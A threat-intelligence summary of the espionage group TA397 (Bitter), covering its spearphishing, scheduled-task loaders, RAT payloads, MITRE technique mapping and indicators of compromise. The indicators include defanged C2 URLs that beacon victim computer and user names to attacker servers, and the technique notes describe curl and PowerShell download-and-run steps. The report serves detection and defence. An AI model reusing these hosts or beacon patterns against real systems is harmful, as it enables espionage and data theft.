TA397 is a state-backed espionage group likely operating on behalf of the Indian state, targeting government and defense organizations primarily in Europe and Asia with interests in China and neighboring countries. The group uses spearphishing emails, scheduled tasks, and various malware payloads to conduct intelligence gathering, exhibiting consistent infrastructure activity within Indian Standard Time working hours. #TA397 #Bitter #BDarkRAT #KugelBlitz #MiyaRAT
Keypoints
- TA397 is assessed as a state-backed threat actor aligned with Indian intelligence, focused on espionage against governments, defense, and diplomatic targets in Europe and Asia.
- The group frequently uses spearphishing with attachments or URLs that deliver scheduled tasks to load malicious payloads, often involving obfuscated PowerShell commands and various file types including MSC, LNK, and CHM files.
- TA397’s campaigns often masquerade as legitimate government or embassy entities, including those of Madagascar and Mauritius, using topical subject lines to blend into legitimate email traffic.
- Hands-on-keyboard activity by TA397 is observed within Indian Standard Time work hours, involving deployment of RATs such as wmRAT, MiyaRAT, BDarkRAT, and payloads like KugelBlitz and Demon agent from Havoc C2 framework.
- Infrastructure analysis shows consistent domain registration, certificate issuance, and activity timestamps aligned with Indian Standard Time business hours, strengthening attribution to South Asian origin.
- The group consistently includes victim computer names and usernames in beaconing to their staging PHP endpoints, using Let’s Encrypt TLS certificates on their infrastructure for cover.
- TA397 demonstrates operational maturity through campaign targeting, payload diversity, and infrastructure fingerprints but shows less sophistication in phishing content compared to other state-backed actors.
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – TA397 uses spearphishing emails with malicious attachments (e.g., RAR-enclosed CHM files) to gain initial access. (“The emails in the campaigns we observed typically contained either a direct attachment or a URL…”)
- [T1053.005] Scheduled Task/Job: Scheduled Task – The group consistently creates scheduled tasks that beacon to C2 servers every 16-19 minutes. (“Scheduled tasks which beacon every 16 minutes to the staging domain woodstocktutors[.]com…”)
- [T1105] Ingress Tool Transfer – TA397 transfers payloads using files downloaded via PowerShell or curl from attacker-controlled infrastructure. (“PowerShell through conhost.exe to download and run the next stage payload every 16 minutes with the curl utility.”)
- [T1083] File and Directory Discovery – Hands-on-keyboard activity includes enumerating files and directories to collect system information. (“cd C:programdata dir > abc1.pdf…”)
- [T1005] Data from Local System – The actor exfiltrates files including scanned government documents from infected machines. (“Within TA397’s drive, Proofpoint found two documents… likely exfiltrated from TA397 victims.”)
- [T1071.001] Application Layer Protocol: Web Protocols – C2 beaconing and data exfiltration is performed over HTTP/HTTPS using PHP endpoints on staging domains. (“HTTP POST requests sent to staging domain PHP endpoints such as /svupfl.php and /urf.php”)
- [T1204] User Execution – Infection depends on user opening and executing malicious attachments or links. (“If double clicked and run by the user, the MSC started mmc.exe setting up scheduled tasks…”)
- [T1218] System Binary Proxy Execution – Use of legitimate system binaries like conhost.exe, cmd.exe, curl, and mmc.exe to execute malicious commands and payloads. (“Using conhost.exe and cmd.exe commands to create scheduled tasks and download payloads.”)
Indicators of Compromise
- [Domain] TA397 staging domains used for payload delivery and C2: mnemautoregsvc[.]com (October 2024), jacknwoods[.]com (November 2024), woodstocktutors[.]com (April 2025), princecleanit[.]com (March 2025), utizviewstation[.]com (February 2025), warsanservices[.]com (April 2025)
- [SHA256] Samples linked to scheduled task loaders: 1b67fc55fd050d011d6712ac17315112767cac8bbe059967b70147610933b6c1 (LNK loader, December 2024), 7c5dde52845ecae6c80c70af2200d34ef0e1bc6cbf3ead1197695b91acd22a67 (CHM loader, December 2024), 55f75724386dbe740c0b868da913af2c8b280335da4fde64e2300c776b79d4e8 (CHM loader, February/March 2025)
- [URL] Payload delivery and command URLs including: hxxp://46.229.55[.]63/svch.php?li=%computername%..%username% (December 2024), hxxp://95.169.180[.]122/vbgf.php?mo=%computername%–%username% (December 2024)
- [IP Address] Payload hosting and C2 IPs: 72.18.215[.]108 (Havoc C2 communication), 173.254.204[.]72 (payload hosting, noted 404 error on dune64.log)